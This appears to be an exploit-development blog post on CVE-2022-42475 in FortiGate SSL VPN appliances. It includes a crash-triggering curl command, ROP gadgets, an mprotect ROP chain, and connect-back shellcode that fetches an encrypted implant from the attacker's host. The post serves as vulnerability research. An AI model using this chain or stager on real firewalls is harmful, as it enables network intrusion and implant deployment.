A More Complete Exploit for Fortinet CVE-2022-42475
Background
Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall.
According to Fortinet, the following FortiGate models were targeted in attacks against unnamed European and African organizations:
- FG100F
- FG101F
- FG200D
- FG200E
- FG201F
- FG240D
- FG3H0E
- FG5H0E
- FG6H1E
- FG800D
- FGT5HD
- FGT60F
- FGT80F
Our Cosmos customers were promptly notified when this vulnerability affected them. As always, we prioritize our security research efforts in order to inform our customers about zero-day vulnerabilities.
Mandiant also performed an analysis of the bug along with the BOLDMOVE malware deployed alongside the exploit. The activity was attributed to Chinese nation-state actors that discovered, weaponized, and leveraged their customized exploit to compromise sensitive networks.
In this blog, we cover the bug, the outlines of the exploit, return-oriented programming (ROP) chains, shellcode, and optimizations. Unlike previously published research, we show how an exploit can be built to target a single specific FortiGate appliance running a single specific version of FortiOS.
Since discovery and publication of details pertaining to CVE-2022-42475, a few researchers (see Prior Work below) have posted blogs and proof-of-concept (PoC) scripts that reproduce the bug and, in some cases, exploit it under highly restrictive conditions (i.e., specific appliance models and operating system versions).
Here on Team X, a specialized division within Bishop Fox's Capability Development group dedicated to vulnerability research and exploit development, we went after this bug in more depth. We are happy to report that we've largely succeeded in that mission and would like to share some of the journey with you.
Prior Work
We have a lot of ground to cover, so we won't be reviewing previous research in this blog. However, the publicly known state of FortiGate hacking is in its infancy, so we expect to see much more research in the future based on the work presented here and in other forums. To see details on initial work by other security researchers, check out these resources:
- Fortinet's write-up of the bug.
- Studyskill's work on extracting the affected/required files from FortiGate virtual machines.
- SCRT's work on reproducing the bug.
- Watchtowr's work on exploiting the bug.
Assumptions and Research Environment Configuration
Most of our testing was carried out against a FortiGate 100D purchased from eBay for a couple hundred dollars. It ran FortiOS 6.0.4 for the duration of the research project and has an Intel x86_64 CPU. The remainder of testing was conducted against VMware versions of FortiGate. All FortiGate devices are Linux-based, albeit stripped down to the bare bones.
Simply being in possession of a FortiGate device is insufficient for research purposes because we needed root access to the underlying Linux OS (a.k.a. FortiOS) on hardware appliances and virtual machines to kick-start our research. We determined that Fortinet did not provide a mechanism to obtain a root shell on their appliances, so we needed to hack a solution.
Getting Root Access to the 100D
To get a root shell on the 100D and to install GDB, Frida server, etc., we created a local root exploit for another FortiGate bug (CVE-2021-44168). Interestingly, much like CVE-2022-42475, CVE-2021-44168 was discovered during the investigation of a compromised FortiGate firewall. Note: we are beginning to see a pattern of a nation-state actor that has gone to great lengths to reverse-engineer Fortinet devices and create private 0-days for use against high-value targets.
The Bug
Reproducing the Crash
Based on SCRT's and Watchtowr's work, we started with these exploit commands:
$ perl -e 'print "A"x100000' > payload
$ curl --data-binary @payload -H 'Content-Length: 4294967297' -vik 'https://vpn.example.com:8443/remote/logincheck?AAAA=BBBB'
When we attached to the sslvpnd daemon with gdb, we saw the following crash:
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007fae8fe964ee in ?? () from /fortidev/lib/x86_64-linux-gnu/libssl.so.1.1
Take a look at where it crashed:
(gdb) x/2i $rip
=> 0x7fae8fe964ee:    call   QWORD PTR [rax]
   0x7fae8fe964f0:    test   eax,eax
We see that it loaded a function pointer from the memory that the rax register points to and called it! What's in memory at the address in rax?
(gdb) x/8x $rax
0x7fae8b58ea00:    0x41414141    0x41414141    0x41414141    0x41414141
0x7fae8b58ea10:    0x41414141    0x41414141    0x41414141    0x41414141
Well, well, well. Our payload appeared – what an absolute score of a result! The stars sure did align for this one.
Please note that we're not diving into the root causes of this bug. For that, please refer to Watchtowr's research on the matter. We're focused strictly on exploitation.
Identifying Exploit Mitigations
During our research, we investigated the exploit mitigation controls in FortiGate firewalls. We found the usual Linux OS-enforced data execution prevention (DEP), but a few things were missing, such as address space layout randomization (ASLR), stack canaries, and position independent executables (PIE). This trend seemed to be consistent across VMs and FortiGate hardware appliances.
Setting Exploit Goals
We wanted to drop a Sliver Linux implant onto the firewall, so we could use it as a pivot point into an organization's networks. Sliver implants are typically large (10MB is reasonable), and we found that embedding one into an HTTP POST request led to corruption every time. We simply could not inject the entire implant binary into memory reliably, and since reliability is one of the core goals of a high-quality exploit, we abandoned this approach. The root cause seemed to be the SSL VPN software scribbling over the implant data prior to the exploit being triggered. We could have written the exploit to shell out to the FortiGate's underlying Linux OS to perform a download of the Sliver implant, but there were several problems with that approach:
- No functioning shell in FortiOS
- No Perl, Ruby, PHP, etc., scripting languages
- Python isn't ubiquitous and is only present on older firewalls
- No consistent way to write a generic shell-out payload
Instead, we decided on using a more generic shellcode stager that ran in the following way:
- Attacker runs the exploit
- Exploit runs shellcode on the target appliance
- Shellcode connects back to attacker and downloads an encrypted Sliver implant
- Shellcode decrypts the Sliver implant and saves it to disk
- Shellcode runs the Sliver implant which connects back to attacker's Sliver server
Exploiting like the 90s
If we could execute code on the heap, we would have been in good shape: just write some shellcode, put it on the heap, and point call [rax] at it. However, Linux DEP prevents that. Instead, we had to do some ROP chaining in which we found and reused existing code "gadgets" in the FortiGate sslvpnd binary (which is actually just a symlink to a monolithic, 80MB, dynamically linked init binary).
We didn’t want to use ROP for the entire download/decrypt/execute sequence because that is too painful, and we needed to jump from ROP into shellcode as quickly as possible. The goal of our ROP chain was simple:
- Pivot the stack pointer rsp to point at our HTTP POST payload, where the ROP chain and shellcode are stored.
- Make the payload executable by calling mprotect(rsp & 0xfffffffffffff000, 0x5000, PROT_READ | PROT_WRITE | PROT_EXEC) on the memory region in which it is stored (the bitmask aligns the memory address to a 4k page boundary).
- Jump to shellcode within the payload.
Typically, ROP gadgets are built into a chain that repeats "execute instructions; return;" until the desired objective is met, but the second and third steps are a little more convoluted than they seem at first. Let's check it out!
Execute the Stack Pivot
At the moment call [rax] was executed (remember, we controlled the memory that rax pointed to), the stack pointer rsp pointed at sslvpnd's real stack. This was useless to us because our payload wasn't there. It was somewhere on the heap, which means we had to figure out how to put the address of our payload into rsp using only a single gadget. Stack pivots don't always have to fit in a single gadget, but the complexity of multi-gadget stack pivots is outside the scope of this blog post.
Why just one gadget? At the end of a gadget, we'll typically hit a ret instruction, which pops an address off the stack at address rsp and jumps to it by placing that address into the rip register. If rsp doesn't point to our ROP chain when the ret instruction executes, then we're hosed: we have no control over the popped value, and we jump into garbage...or random instructions...or the stack. Regardless of where rip ends up, the effect is the same: insta-crash.
The easiest way to pivot was to find a pointer to our payload in one of the registers and find a gadget that does the equivalent of mov rsp, <register>; ret;. Did we have a pointer to the payload in any of the registers at the moment of exploitation? The answer in this case is yes!
Let's look at the registers at the point of crash:
(gdb) i r
rax            0x4141414141414141  4702111234474983745
rbx            0x7fae8b569800      140387638745088
rcx            0x0                 0
rdx            0x7fae8b56d4f8      140387638760696
rsi            0x7fae8b5736a8      140387638785704
rdi            0x7fae8b569800      140387638745088
rbp            0x7fffe4f967e0      0x7fffe4f967e0
rsp            0x7fffe4f94688      0x7fffe4f94688
r8             0x4141414141414141  4702111234474983745
r9             0x4141414141414141  4702111234474983745
r10            0x4141414141414141  4702111234474983745
r11            0x4141414141414141  4702111234474983745
r12            0x7fae8b569940      140387638745408
r13            0x7fae8b56d4f8      140387638760696
r14            0x131d2fc0          320679872
r15            0x7fae8b5736a8      140387638785704
rip            0x7fae8fe964ee      140387715474670
eflags         0x206               [ PF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
Ok, what's in rdx?
(gdb) x/xg $rdx
0x7fae8b56d4f8: 0x4141414141414141
Bingo! rdx pointed into our HTTP POST data. Therefore, the stack pivot requirements were as simple as mov rsp, rdx; ret. Sadly, there was no such gadget in the sslvpnd binary (whomp whomp). Time to hunt for trickier gadgets!
After some fiddling with ropr, we settled on a regex search that hit a few suitable gadgets:
0x00d90512: push rdx; lodsb [rsi]; adc bl, [rbx+0x41]; pop rsp; pop rbp; ret;
0x0130acd4: push rdx; add [rbx+0x41], ebx; pop rsp; mov qword ptr [rip+0x14792b24], 0x130aa20; pop rbp; ret;
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret;
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;
0x0285c4b0: push rdx; mov esi, 0xc48348fd; and [rbx+0x41], bl; pop rsp; pop rbp; ret;
==> Found 5 gadgets in 5.543 seconds
The simplest gadgets were:
0x01877a81: push rdx; add bl, [rbx+0x41]; pop rsp; pop rbp; ret;
0x01b666bc: push rdx; adc [rbx+0x41], bl; pop rsp; pop rbp; ret;
Picking the gadget at address 0x01b666bc, we confirmed the gadget's existence and accuracy using Radare2:
r2 ./[redacted]/init
 -- r2 is for the people
[0x00447d30]> s 0x01b666bc
[0x01b666bc]> pi 5
push rdx
adc byte [rbx + 0x41], bl
pop rsp
pop rbp
ret
Excellent! One concern remained, since this gadget had a few extraneous instructions, in particular adc byte [rbx + 0x41], bl. This instruction reads and writes the byte at address rbx + 0x41, which means rbx + 0x41 had to point to a valid, mapped, and writable area of memory. If it didn't, the gadget would crash, and we would have needed a new gadget.
We were in luck, though, because of what we found in rbx at the moment of exploitation:
(gdb) i r rbx
rbx            0x7fae8b569800      140387638745088
(gdb) x/xg $rbx
0x7fae8b569800: 0x4141414141414141
That is a valid address, alright: this gadget wouldn't crash! Ignoring the extraneous instructions (the adc, and the pop rbp, which simply consumes the first qword of our payload), the effective action of the stack pivot gadget is therefore:
push rdx
pop rsp
ret
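To make the register shuffle concrete, here is a small Python model of the pivot gadget; it is our own illustration, not part of the exploit. It treats memory as a dictionary of 8-byte slots, skips the adc side effect, and uses the rdx and rsp values from the crash above plus a made-up first gadget address (0x401000).

```python
def run_pivot(regs: dict, mem: dict) -> dict:
    """Model "push rdx; pop rsp; pop rbp; ret;" (the adc side effect is omitted)."""
    regs = dict(regs)  # work on a copy of the register file

    # push rdx: decrement rsp, then store rdx at the new top of stack
    regs["rsp"] -= 8
    mem[regs["rsp"]] = regs["rdx"]

    # pop rsp: rsp receives the value just pushed, i.e. the payload pointer
    regs["rsp"] = mem[regs["rsp"]]

    # pop rbp: consumes the first payload qword as filler
    regs["rbp"] = mem[regs["rsp"]]
    regs["rsp"] += 8

    # ret: the next payload qword becomes rip, so the ROP chain runs from here
    regs["rip"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    return regs


if __name__ == "__main__":
    payload = 0x7FAE8B56D4F8                 # rdx at the crash
    mem = {
        payload: 0x4141414141414141,         # filler popped into rbp
        payload + 8: 0x401000,               # hypothetical first gadget address
    }
    regs = {"rsp": 0x7FFFE4F94688, "rdx": payload, "rbp": 0, "rip": 0}
    after = run_pivot(regs, mem)
    print(hex(after["rip"]), hex(after["rsp"]))  # prints: 0x401000 0x7fae8b56d508
```

The model shows why the pop rbp matters when laying out the payload: the first qword at rdx is burned as filler, and the chain proper starts 8 bytes in.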
Now that we had a stack pivot gadget, we proceeded to the rest of the ROP chain.
Find the mprotect(2) Function
To make our shellcode executable, we needed the address of mprotect(2) in the target binary's procedure linkage table (PLT). The address was easy to obtain using objdump:
objdump -D -j .plt init-6.4.9-800D | egrep 'mprotect'
000000000042ac50 <mprotect@plt>:
The address 0x42ac50 was the trampoline for the mprotect function. If we jumped to it, we called mprotect. It is important to note that this address was valid only for this specific binary; any other version of the FortiOS init binary would likely have a different address. For example, the same lookup against the init binary from the FortiGate 100D 6.0.4 firmware that we used gives:
objdump -D -j .plt init-6.0.4-100D | egrep 'mprotect'
0000000000420630 <mprotect@plt>:
We saw that 0x420630 was not the same as 0x42ac50. Therefore, we needed the function PLT addresses for each version of FortiOS that we wished to exploit. More on this later! For now, we had our mprotect address. How did we use it?
Examine the Structure of mprotect
We called mprotect through its library function in the PLT rather than invoking the system call directly. Normally, we would have just found a gadget like syscall; ret; to make the system call ourselves, but in this case, the available gadgets were of such low quality (they stomped all over a bunch of registers and memory) that we used the library function instead.
Let's consider how to call mprotect:
int mprotect(void *addr, size_t len, int prot);
So, we needed to do this:
#include <stdint.h>
#include <sys/mman.h>

#define PROT_RWX (PROT_READ | PROT_WRITE | PROT_EXEC) // = 7
#define MEMORY_LENGTH 0x5000 // not important, just make it big enough for all the shellcode
#define ALIGNED_ADDRESS(addr) ((void *)((uintptr_t)(addr) & 0xfffffffffffff000)) // page-aligned address

mprotect(ALIGNED_ADDRESS(address_of_shellcode), MEMORY_LENGTH, PROT_RWX);
The mprotect call had to be passed a memory address that lies on a 4k page boundary, hence the logical AND operation. If the address wasn't on a page boundary, the call would fail (mprotect returns EINVAL for an unaligned address).
When calling functions under the x86_64 System V ABI (as used by Linux / FortiOS), the arguments are passed in the registers rdi, rsi, rdx, rcx, r8, and r9, in that order. We used the first three registers to populate the three parameters passed to mprotect:
rdi = ALIGNED_ADDRESS
rsi = 0x5000
rdx = 7
The second and third registers were easy to set using ROP gadgets: we just did pop rsi; ret; and pop rdx; ret; and placed the values we needed onto the stack / ROP chain. Getting an aligned address into rdi was a little more difficult because we needed to do the following steps:
- Get the memory address of our ROP chain / shellcode
- Do the logical AND operation
- Store the result in rdi
Get the Address of Our ROP Chain
Let's look at the registers at the point of crash:
(gdb) i r
rax            0x4141414141414141  4702111234474983745
rbx            0x7fae8b569800      140387638745088
rcx            0x0                 0
rdx            0x7fae8b56d4f8      140387638760696
rsi            0x7fae8b5736a8      140387638785704
rdi            0x7fae8b569800      140387638745088
rbp            0x7fffe4f967e0      0x7fffe4f967e0
rsp            0x7fffe4f94688      0x7fffe4f94688
r8             0x4141414141414141  4702111234474983745
r9             0x4141414141414141  4702111234474983745
r10            0x4141414141414141  4702111234474983745
r11            0x4141414141414141  4702111234474983745
r12            0x7fae8b569940      140387638745408
r13            0x7fae8b56d4f8      140387638760696
r14            0x131d2fc0          320679872
r15            0x7fae8b5736a8      140387638785704
rip            0x7fae8fe964ee      140387715474670
eflags         0x206               [ PF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
We had the approximate address of our payload / ROP chain / shellcode in registers rbx, rdx, rdi, rsi, r12, r13, and r15. I say "approximate" because all those registers pointed to slightly different addresses within the payload. This is fine because we were rounding down to the nearest 4k page, so we didn't care about the least significant 12 bits (the last three hex digits). With this in consideration, we got:
rbx 0x7fae8b569800
rdx 0x7fae8b56d4f8
rsi 0x7fae8b5736a8
rdi 0x7fae8b569800
r12 0x7fae8b569940
r13 0x7fae8b56d4f8
r15 0x7fae8b5736a8
We discarded any address starting with 0x7fae8b57xxxx because those addresses were too far into our payload; we ran the risk of making the wrong section of memory executable. The following candidates remained:
rbx 0x7fae8b569800
rdx 0x7fae8b56d4f8
rdi 0x7fae8b569800
r12 0x7fae8b569940
r13 0x7fae8b56d4f8
We discarded the higher addresses, which left:
rbx 0x7fae8b569800
rdi 0x7fae8b569800
rbx and rdi were our candidate registers for finding the address of our payload / ROP chain / shellcode. We wanted to perform a logical AND operation such that 0x7fae8b569800 & 0xfffffffffffff000 = 0x7fae8b569000.
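The alignment arithmetic is easy to sanity-check in a few lines of Python. This sketch is our own illustration: it takes the register values from the crash and the 0x5000 length from the mprotect call, and computes the range each candidate pointer would make executable.

```python
PAGE_MASK = 0xFFFFFFFFFFFFF000  # clears the low 12 bits (4 KiB pages)
MEM_LEN = 0x5000                # length passed to mprotect in the ROP chain


def page_align(addr: int) -> int:
    """Round addr down to the start of its 4 KiB page."""
    return addr & PAGE_MASK


def rwx_window(addr: int, length: int = MEM_LEN) -> tuple:
    """Return the [start, end) range mprotect would cover for this pointer."""
    start = page_align(addr)
    return start, start + length


if __name__ == "__main__":
    # Register values from the crash (rdi holds the same pointer as rbx).
    for name, value in {"rbx": 0x7FAE8B569800,
                        "rdx": 0x7FAE8B56D4F8,
                        "rsi": 0x7FAE8B5736A8}.items():
        start, end = rwx_window(value)
        print(f"{name}: {start:#x}-{end:#x}")
```

With rbx/rdi, the window runs from 0x7fae8b569000 to 0x7fae8b56e000, which also covers the address in rdx where the pivoted chain begins; a window derived from rsi or r15 would start past that point.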
Call mprotect to Make Our Payload Executable
We assembled the following gadget chain to perform the operation:
// Set up arguments #2 and #3 for mprotect
pop rsi; ret;            // pop 0x5000 off the "stack" (aka ROP chain) into rsi (2nd mprotect argument)
pop rdx; ret;            // pop 0x7 off the "stack" into rdx (3rd mprotect argument)

// Set up argument #1 for mprotect
pop rax; ret;            // pop 0xfffffffffffff000 off the "stack" into rax
and rax, rdi; ret;       // compute 0xfffffffffffff000 & 0x7fae8b569800 and save the result in rax

// There is no "mov rdi, rax; ret;" gadget available, so we use this more complex variant instead.
pop rbx; ret;            // pop the address of an "add rsp, 0x18; ret;" gadget off the "stack" into rbx
mov rdi, rax; call rbx;  // copy the page-aligned address into rdi (1st mprotect argument), then call rbx.
                         // call pushes a return address; "add rsp, 0x18" discards it plus the next
                         // two chain entries, and its RET lands in the RET sled below.
ret; ret; ret; ret; ret; ret; ret; ret;  // you could call this a "ret sled" instead of a "nop sled"

// Call mprotect
pop rax; ret;            // pop the mprotect PLT address off the "stack"
jmp rax;                 // mprotect will RET and execution will continue at the next ROP entry
We now had executable shellcode at a known address in memory.
Jump to Our Shellcode
The jump to shellcode was simple:
// The last instruction in the ROP chain simply jumps to the stack pointer, which
// conveniently points at the next item on our payload / ROP chain / shellcode.
jmp rsp;

// Shellcode follows
0x9090909090909090 // NOP sled
...
Writing the Shellcode
We could use arbitrary bytes in the shellcode because there were no disallowed characters. This made the process of writing shellcode pretty straightforward. Of course, we over-complicated this process to achieve the following goals:
- All shellcode/payload/staging/implant/data must be encrypted in transit over the internet
- Everything in the exploit payload must fit into a 64k buffer to avoid data corruption
- The exploit must get feedback from the shellcode regarding its status as it runs
- The exploit must deploy a Sliver implant onto the FortiGate firewall
Encrypt All the Things
We could have written our own crypto functions, but that wasn't efficient. Instead, we borrowed OpenSSL's AES_set_decrypt_key and AES_cbc_encrypt functions from the FortiGate binary's PLT by using the same objdump trick we used for mprotect:
objdump -D -j .plt init-6.0.4-100D | egrep ' <(mprotect|calloc|AES_set_decrypt_key|AES_cbc_encrypt)@plt' | sed -e 's/00000000//g' -e 's/ </:/g' -e 's/@plt>://g'
00420630:mprotect
00424720:AES_cbc_encrypt
00424a40:calloc
00426d70:AES_set_decrypt_key
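If you'd rather not maintain the sed expression, the same lookup can be done on objdump's output in Python. This is a hypothetical helper (parse_plt is our name, not part of the exploit); it expects the text produced by a command such as objdump -D -j .plt <binary>, and it fails loudly when a needed symbol is missing, which matters when juggling many firmware builds. The sample below reconstructs the untrimmed symbol lines from the output above.

```python
import re

# Matches objdump symbol lines such as "0000000000420630 <mprotect@plt>:"
PLT_LINE = re.compile(r"^([0-9a-f]+) <(\w+)@plt>:$")


def parse_plt(objdump_text: str, wanted: set) -> dict:
    """Map each wanted function name to the address of its PLT stub."""
    found = {}
    for line in objdump_text.splitlines():
        match = PLT_LINE.match(line.strip())
        if match and match.group(2) in wanted:
            found[match.group(2)] = int(match.group(1), 16)
    missing = wanted - set(found)
    if missing:
        raise KeyError(f"no PLT entry for: {sorted(missing)}")
    return found


if __name__ == "__main__":
    # Symbol lines for init-6.0.4-100D (instruction lines omitted).
    sample = """
0000000000420630 <mprotect@plt>:
0000000000424720 <AES_cbc_encrypt@plt>:
0000000000424a40 <calloc@plt>:
0000000000426d70 <AES_set_decrypt_key@plt>:
"""
    names = {"mprotect", "calloc", "AES_set_decrypt_key", "AES_cbc_encrypt"}
    for name, addr in sorted(parse_plt(sample, names).items(), key=lambda kv: kv[1]):
        print(f"{addr:08x}:{name}")
```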
The exploit then patched these PLT addresses into the shellcode at runtime. For example, here's a snippet from the shellcode where the address of AES_set_decrypt_key() was marked with a placeholder until the exploit replaced it with the correct value:
# setup and call OpenSSL's AES_set_decrypt_key()
movq   %r10, %rdi                  # ptr to AES key bytes
movq   $0x80, %rsi                 # 128 (0x80) bits
movq   %r15, %rdx                  # AES_key struct address
movabs $0x3333333333333333, %rax   # replaced at runtime with the real PLT address
movq   %rax, %rcx                  # address of AES_set_decrypt_key()
movq   %rsp, %rbx                  # save the stack pointer
addq   $0x4000, %rsp               # switch to a stack region 0x4000 bytes higher for the call
callq  *%rcx
Inside the exploit our code did this prior to copying the shellcode into the exploit payload buffer:
import struct

# fix up PLT function addresses in the shellcode
shellcode = shellcode.replace(b"33333333", struct.pack("<Q", rop.get_address("AES_set_decrypt_key")))
shellcode = shellcode.replace(b"44444444", struct.pack("<Q", rop.get_address("AES_cbc_encrypt")))
shellcode = shellcode.replace(b"55555555", struct.pack("<Q", rop.get_address("calloc")))
This method allowed us to write the shellcode and make it portable across all of the versions of FortiGate that we wanted to target.
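One risk with 8-byte placeholders is an accidental match elsewhere in the assembled bytes, or a marker that appears more often than expected (the 0x3838383838383838 hello/goodbye marker, for instance, is used twice). A defensive variant of the replace calls might look like the following; patch_placeholder and its expected parameter are our own illustration, not the exploit's code.

```python
import struct


def patch_placeholder(code: bytes, placeholder: bytes, value: bytes,
                      expected: int = 1) -> bytes:
    """Replace a placeholder in assembled shellcode, checking length and count."""
    if len(value) != len(placeholder):
        raise ValueError("replacement must be the same length as the placeholder")
    count = code.count(placeholder)
    if count != expected:
        raise ValueError(f"{placeholder!r} found {count} times, expected {expected}")
    return code.replace(placeholder, value)


if __name__ == "__main__":
    # movabs $0x3333333333333333, %rax followed by mov %rax, %rcx
    code = b"\x48\xb8" + b"3" * 8 + b"\x48\x89\xc1"
    patched = patch_placeholder(code, b"33333333", struct.pack("<Q", 0x426D70))
    print(patched.hex())
```

Keeping the replacement the same length as the placeholder matters because any size change would shift every following instruction in the shellcode.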
Shellcode
Speaking of shellcode, let’s take a look at it.
# assemble: as -o shellcode.o shellcode.s
# convert:  objdump -d -M intel shellcode.o | egrep '^...[a-z0-9]:' | cut -c 7-28 | tr -d '\n' | tr -d ' ' | tr -d '\t' | sed 's/\(..\)/\\x\1/g'
.global _shellcode
.global _readloop
.text
Above is the preamble, along with comments explaining how to convert the assembled .o file into a \x-encoded sequence of opcode bytes.
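For readers who prefer to skip the shell pipeline, here is a Python sketch of the same conversion. It assumes objdump's default layout (address, colon, tab, then hex bytes) and that long instructions such as movabs spill their remaining bytes onto a continuation line; objdump_to_bytes and to_c_escape are hypothetical helper names.

```python
import re

# Instruction lines look like "   0:\t48 c7 c7 02 00 00 00 \tmov    rdi,0x2";
# continuation lines carry only the leftover bytes of a long instruction.
INSN_LINE = re.compile(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} ?)+)")


def objdump_to_bytes(listing: str) -> bytes:
    """Collect the opcode bytes from `objdump -d` output, in order."""
    out = bytearray()
    for line in listing.splitlines():
        match = INSN_LINE.match(line)
        if match:
            out += bytes.fromhex(match.group(1))  # fromhex skips the spaces
    return bytes(out)


def to_c_escape(code: bytes) -> str:
    """Render bytes as a \\x-encoded string, like the sed step in the comment."""
    return "".join(f"\\x{b:02x}" for b in code)
```

Header lines such as the file-format banner and the "<_shellcode>:" label don't match the pattern, so only instruction bytes are collected.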
Next, we called socket(2) to create a new socket that we used to connect back from the exploited FortiGate to the attacker's internet-facing computer:
_shellcode:
    # socket(2)
    movq $0x2, %rdi        # AF_INET
    movq $0x1, %rsi        # SOCK_STREAM
    movq $0x0, %rdx        # 0
    movq $0x29, %rax       # 41 = 0x29 = socket syscall
    syscall                # rax = socket(AF_INET, SOCK_STREAM, 0);
    movq %rax, %rbx        # save socket fd in rbx
Having acquired a socket, the next step was to connect(2) to the attacker's computer. We did this by building the required data structure in registers and then pushing it onto the stack to create a C-style struct. The comments in the code show exactly what each byte in each register is doing:
    # connect(2)
    # We're going to build a hokey sockaddr_in struct using registers, then push it to the stack.
    # Here's the struct:
    #
    # struct sockaddr_in {
    #     short          sin_family;   // e.g. AF_INET
    #     unsigned short sin_port;     // e.g. htons(3490)
    #     struct in_addr sin_addr;     // see struct in_addr, below
    #     char           sin_zero[8];  // zero this by convention
    # };
    #
    # struct in_addr {
    #     uint32_t s_addr;             // IPv4 address in network (big-endian) byte order
    # };
    xorq %rdx, %rdx
    pushq %rdx                         # push 0x0000000000000000 (sockaddr_in->sin_zero)
    # I = IP address
    # P = TCP port
    # F = AF_INET
    #      IIIIIIIIPPPPFFFF
    movq $0x5858585858580002, %rdx     # sockaddr_in->sin_addr, sin_port, sin_family
    pushq %rdx                         # store it just below sin_zero on the stack
    movq %rax, %rdi                    # %rax = socket fd from the socket() syscall
    movq $0x10, %rdx                   # sizeof(sockaddr_in) = 16 bytes
    movq %rsp, %rsi                    # sockaddr_in struct is on the stack @ %rsp
    movq $0x2a, %rax                   # connect(2) syscall
    syscall
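The single movq immediate packs sin_family, sin_port, and sin_addr into one qword. The following Python sketch (our own; the documentation address 192.0.2.10 and port 4444 are arbitrary examples) builds the same 16-byte struct and shows which 64-bit immediate it corresponds to, including the 0x5858585858580002 placeholder form in which six "X" bytes await the port and IP.

```python
import socket
import struct

AF_INET = 2  # value of AF_INET on Linux


def sockaddr_in(ip: str, port: int) -> bytes:
    """Build the 16-byte struct sockaddr_in that the shellcode pushes."""
    return (struct.pack("<H", AF_INET)   # sin_family: host (little-endian) order
            + struct.pack(">H", port)    # sin_port: network (big-endian) order
            + socket.inet_aton(ip)       # sin_addr: network order
            + b"\x00" * 8)               # sin_zero


def first_qword(sa: bytes) -> int:
    """The 64-bit immediate whose little-endian bytes are sa[0:8]."""
    return struct.unpack("<Q", sa[:8])[0]


if __name__ == "__main__":
    sa = sockaddr_in("192.0.2.10", 4444)
    print(hex(first_qword(sa)))                        # prints: 0xa0200c05c110002
    print(hex(first_qword(b"\x02\x00" + b"X" * 6)))    # prints: 0x5858585858580002
```

This also explains why the exploit patches the "XXXXXX" bytes with a big-endian port followed by the raw IP bytes: that is exactly the in-memory order of sin_port and sin_addr.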
Once the shellcode connected to the attacker's computer, it sent a quick "hello" packet containing an arbitrary 8-byte value specified by the exploit. The exploit checked the packet and verified that it contained the expected 8-byte value. If the value matched, the exploit assumed that the shellcode was running correctly:
    # write(2) response to the stager to say hello
    subq $0x20, %rsi
    movabs $0x3838383838383838, %rax
    movq %rax, (%rsi)                  # response contains whatever the exploit patched in here
    movq %rbx, %rdi                    # socket fd -> rdi
    movq $0x8, %rdx                    # payload len = 8 bytes
    movq $0x1, %rax                    # write(2)
    syscall                            # send "hello" to the hax0r host
The shellcode then expected the exploit to send a 4-byte length value followed by an encrypted data blob of that length. The data blob was eventually decrypted, saved to the firewall's filesystem, and passed to execve to be executed as an implant. The following code read the length value and saved it in the r13 register:
    # read(2) 4 bytes to use as size X for next read
    movq %rbx, %rdi        # fd -> rdi
    movq %rsp, %rsi        # stack ptr -> rsi
    subq $0x8, %rsi        # storage location 8 bytes below rsp
    movq $0x4, %rdx        # read 4 bytes
    movq $0x0, %rax        # read(2) system call
    syscall                # read 4 bytes from socket. use it as <size> for the next payload.
    # save the payload size in r13
    movl (%rsi), %edx      # rdx = num bytes to read (32-bit load zero-extends, ignoring stale upper bytes)
    movq %rdx, %r13        # save payload size in r13
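On the exploit side, the wire format this implies is simple: a 4-byte length, which the shellcode loads from memory as a little-endian integer, followed by the encrypted blob. Since AES-CBC works on 16-byte blocks, the blob length is a multiple of 16, which is why the real (unpadded) length is patched in separately later. The post doesn't say how the padding bytes are chosen, so this hypothetical sketch (frame_blob and padded_len are our names) only shows the length prefix and the block-size rounding.

```python
import struct

AES_BLOCK = 16  # AES block size in bytes


def frame_blob(blob: bytes) -> bytes:
    """Prefix a blob with the 4-byte little-endian length the shellcode reads."""
    return struct.pack("<I", len(blob)) + blob


def padded_len(n: int, block: int = AES_BLOCK) -> int:
    """Round n up to a whole number of AES-CBC blocks."""
    return (n + block - 1) // block * block
```

For a 10,000,001-byte implant, for example, the sender would transmit 10,000,016 encrypted bytes while the shellcode writes only the original 10,000,001 to disk.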
We used calloc to allocate a block of memory large enough to store the incoming encrypted implant data. Note that 0x3535353535353535 was a placeholder for the address of calloc in the PLT of the FortiGate /bin/init binary and was replaced at runtime by the exploit:
    # calloc(size_of_encrypted_payload, 1)
    movabs $0x3535353535353535, %rax   # placeholder for calloc's PLT address
    movq %r13, %rdi                    # nmemb = encrypted payload size
    movq $0x1, %rsi                    # size = 1 byte each
    callq *%rax
Now that the shellcode allocated a memory region large enough for the payload, we began the process of reading the encrypted implant data:
    # read(2) X bytes of payload
    movq %r13, %rdx      # encrypted payload size in bytes
    movq %rbx, %rdi      # socket fd
    movq %rax, %rsi      # address of calloc()'d buffer
    movq %rsi, %r12      # save payload buffer address in r12
    xorq %r10, %r10      # flags = 0 (the 4th syscall argument goes in r10, not rcx)
    xorq %r8, %r8        # src_addr = NULL
    xorq %r9, %r9        # addrlen = NULL
    xorq %r15, %r15      # use r15 to track total bytes read so far
    # rdi = fd
    # rsi = storage ptr
    # rdx = num bytes left to read
    # r10 = flags
    # r8  = NULL
    # r9  = NULL
    # rax = 0x2d ('recvfrom' syscall #)
    # call: recvfrom(rdi, rsi, rdx, r10, r8, r9)
    # r13 = size of payload
_readloop:
    movq $0x2d, %rax     # recvfrom(2) syscall
    syscall              # try to read rdx bytes
    testq %rax, %rax
    jle _readfinished    # stop on error (< 0) or EOF (0)
    addq %rax, %r15      # keep track of total bytes read
    addq %rax, %rsi      # advance the buffer pointer by the bytes just read
    movq %r13, %rdx
    subq %r15, %rdx      # rdx = bytes still to read
    cmpq %r15, %r13      # if we haven't read all the bytes yet...
    jg _readloop         # ...read some more, otherwise fall through
_readfinished:
